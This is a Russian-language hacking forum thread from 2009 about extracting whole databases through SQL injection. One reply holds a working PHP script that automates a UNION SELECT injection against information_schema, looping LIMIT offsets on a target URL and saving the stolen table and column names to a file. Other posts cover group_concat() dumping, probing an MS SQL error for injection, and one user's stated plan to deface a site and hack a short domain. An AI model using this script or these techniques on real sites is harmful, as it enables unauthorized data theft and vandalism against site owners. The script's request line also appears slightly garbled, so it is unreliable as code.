05.04.2009, 18:54
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Можно ли как-то вывести все таблицы из БД (sql inj) не лимитом?? Т.е не менять limit+1,1, limit+2,1 и т.д, а одним запросом вывести всю БД!!!
|
|
|
05.04.2009, 22:34
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Сообщение от .:[melkiy]:.
Можно ли как-то вывести все таблицы из БД (sql inj) не лимитом?? Т.е не менять limit+1,1, limit+2,1 и т.д, а одним запросом вывести всю БД!!!
Сам вчера распрашивал знакомых по дному вопросу...
Кароче ответ таков:
Мускул здесь нипричём, дело в скрипте, если скрипт не поддержует многостроковый вывод, то никак, но зато для автоматизации перебора через лимит написано множество скриптов. Вот один из них:
PHP код:
<?
#Скрипт для перебора значений limit в sql injection
set_time_limit(0);
error_reporting(0);
#В примере: 0x7C - соответствует символу "|", вместе с символом разделителем 0x3a получается запрос, ограниченный "|:" и ":|"
$n="|:"; #начало искомой
$n2=":|"; #конец искомой
$j=0; #парсить с
$lim=0; #до (0 - если до конца)
function get_page($url){ #получение страницы
$link=parse_url($url);
$host = $link['host'];
$src = $link['path'];
$src .= ($link['query'] > "")?"?".$link['query']:"";
$sock = fsockopen ($host, 80);
fputs ($sock, "GET /$sr<-b>c HTTP/1.0\r\nHost: $host\r\n\r\n");
$cont = "";
while (!feof ($sock)) { $cont .= fgets ($sock); }
fclose ($sock);
return $cont;
}
for($i=$j;($lim != 0) ? $i<$lim : 1 != 0;$i++){ #получение данных
$url="http://www.site.com/products.php?category_id=-1+union+select+1,2,concat_ws(0x3a,0x7c,table_name,column_name,0x7c),4+from+information_schema.columns+limit+$i,1/*"; #ссылка
$page=get_page($url);
$page=strip_tags($page);
$pos=stripos($page,$n);
$pos2=stripos($page,$n2,($pos+1));
if($pos == ""){echo "\n Current value - $i"; break;}
$page=substr($page,($pos+strlen($n)),($pos2-$pos-strlen($n2)));
$page .="\n";
echo $page;
$r=fopen('out.txt','a+'); #сохранение в файл
fputs($r,$page);
fclose($r);
}
?>
// Вроде бы правила ответа на вопрос не нарушел...
|
|
|
|
05.04.2009, 19:02
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
.:[melkiy]:. нет, либо утилитами,очень редко на сайте где уязвимость выводятся вся инфа без использования лимита
|
|
|
|
05.04.2009, 19:43
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
С нами:
9370904
Репутация:
-4
|
|
2 Gorev
А какже group_concat()
я только этим и пользуюсь
|
|
|
|
05.04.2009, 19:48
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами:
10226672
Репутация:
441
|
|
Сообщение от Saiga
2 Gorev
А какже group_concat()
я только этим и пользуюсь
group_concat() НЕ вывод всё....он огранич значением в group_concat_max_len.Так же он вроде бы не поддерживает лимит.
|
|
|
|
05.04.2009, 19:45
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
С нами:
9076508
Репутация:
169
|
|
group_concat выводит, правда не все, а насколько хватит места в поле
|
|
|
|
05.04.2009, 20:20
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Если после ввода такой конструкции site.ru/index.asp?id=2'
Вылезла ошибка :
PHP код:
Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
Unclosed quotation mark before the character string ''.
Возможно ли сдесь провести SQL-inj, просто я в MS SQL не как вообще... |
|
|
|
05.04.2009, 23:26
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
С нами:
9270510
Репутация:
519
|
|
Сообщение от Byrger
Если после ввода такой конструкции site.ru/index.asp?id=2'
Вылезла ошибка :
PHP код:
Microsoft OLE DB Provider for SQL Server ошибка '80040e14'
Unclosed quotation mark before the character string ''.
Возможно ли сдесь провести SQL-inj, просто я в MS SQL не как вообще...https://forum.antichat.ru/thread30501.html
|
|
|
|
05.04.2009, 20:24
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
С нами:
9076508
Репутация:
169
|
|
возможно  |
|
|
|
05.04.2009, 21:27
|
|
Познающий
Регистрация: 27.09.2008
Сообщений: 44
С нами:
9274683
Репутация:
32
|
|
тогда path = http://abc.ru/a.htm
осталось найти трехбуквенник ру
я до этого тоже додумался, и спрашивал, потому что нету желания платить за 3-х значный домен, который мне больше не будет нужен. И сайт сам по себе того не стоит, мне чистый дефейс нужно сделать, пробил все сайты на хосте, ни одной потенциальной баги, все статичные htm мелких предприятий...
з.ы.
но тут появилась идея попробовать взломать какой-нибудь 2-х или 3-х значный домен =)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?1208926){kind=avatar}
Похожие темы
Комбинированный вид
